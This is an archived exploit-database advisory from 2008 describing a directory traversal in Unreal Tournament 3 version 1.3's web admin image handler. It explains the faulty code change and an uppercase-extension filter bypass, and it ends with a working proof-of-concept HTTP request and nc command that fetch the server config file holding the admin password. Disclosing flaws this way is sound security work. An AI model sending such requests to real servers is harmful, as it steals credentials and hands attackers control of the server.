exploit-db-mirror/exploits/windows/remote/6506.txt

#######################################################################

                             Luigi Auriemma

Application:  Unreal Tournament 3
              http://www.unrealtournament3.com
Versions:     1.3 ONLY (both build 3601 and 3614)
              older versions are safe
Platforms:    Windows and Linux
Bug:          directory traversal in the web interface
Exploitation: remote, versus server
Date:         21 Sep 2008
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Unreal Tournament 3 (UT3) is the latest game of the famous homonim
series developed by Epic Games (http://www.epicgames.com).


#######################################################################

======
2) Bug
======


UT3, as any other game based on the Unreal engine, has an internal web
server called uWeb for controlling the own server remotely using a web
browser.
This interface is disabled by default and in the case of UT3 are needed
the additional files located on http://ut3webadmin.elmuerte.com (choice
made by Epic for fixing possibly issues more quickly).

In the last 1.3 patch released the 13th August 2008 has been made a bad
and unusual modification to uWeb.
In fact the WebAdmin component is composed by two sub components/classes
called UTServerAdmin (used for everything) and UTImageServer used only
for the handling of the HTTP requests for the files in the /images
folder.

In the script of the ImageServer component in version 1.3 has been made
the following change which has removed the limitation of downloading
only files with the extentions JPG, JPEG, GIF, BMP and PNG:

ImageServer.uc of version 1.2:
    ...
    else
    {
        Response.HTTPError(404);
        return;
    }
    Response.IncludeBinaryFile( Path $ Image );

ImageServer.uc of version 1.3:
    ...
    else
    {
        Response.SendStandardHeaders("application/octet-stream", true);
    }
    Response.IncludeBinaryFile( Path $ Image );

Not a so dangerous thing except that the directory traversal which has
EVER affected this part of the engine and which has never been possible
to exploit due to the filters on the extensions of the requested files
(an image can't be classified as "sensible" data moreover if there is
no way to know the exact locations of these files) now allows any
external unauthenticated attacker to download files from the system.

In fact when a file is requested the engine first looks in the home
folder of the user who has launched the UT3 server (for example
"C:\Documents and Settings\Administrator\My Documents\My Games\Unreal
Tournament 3") because the configuration files used by the server are
located just there and then in the folder of the game, so having the
server installed on another partition doesn't limit the problem.

For example, it's enough to request the file
"/images/../../UTGame/Config/UTGame.INI" to see all the configuration
of the server which includes also the admin password to gain access to
the same webadmin interface.
In the example I have used the INI extension instead of ini because
this particular extension seems filtered internally so it's enough to
use one or more upper case chars in it to bypass the check while there
are no strange behaviours for the other extensions or files.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/ut3webown.txt

<ut3webown.txt>
GET /images/../../UTGame/Config/UTGame.INI HTTP/1.0
Host: localhost
</ut3webown.txt>

  nc SERVER 80 -v -v < ut3webown.txt


#######################################################################

======
4) Fix
======


No fix


#######################################################################

# milw0rm.com [2008-09-21]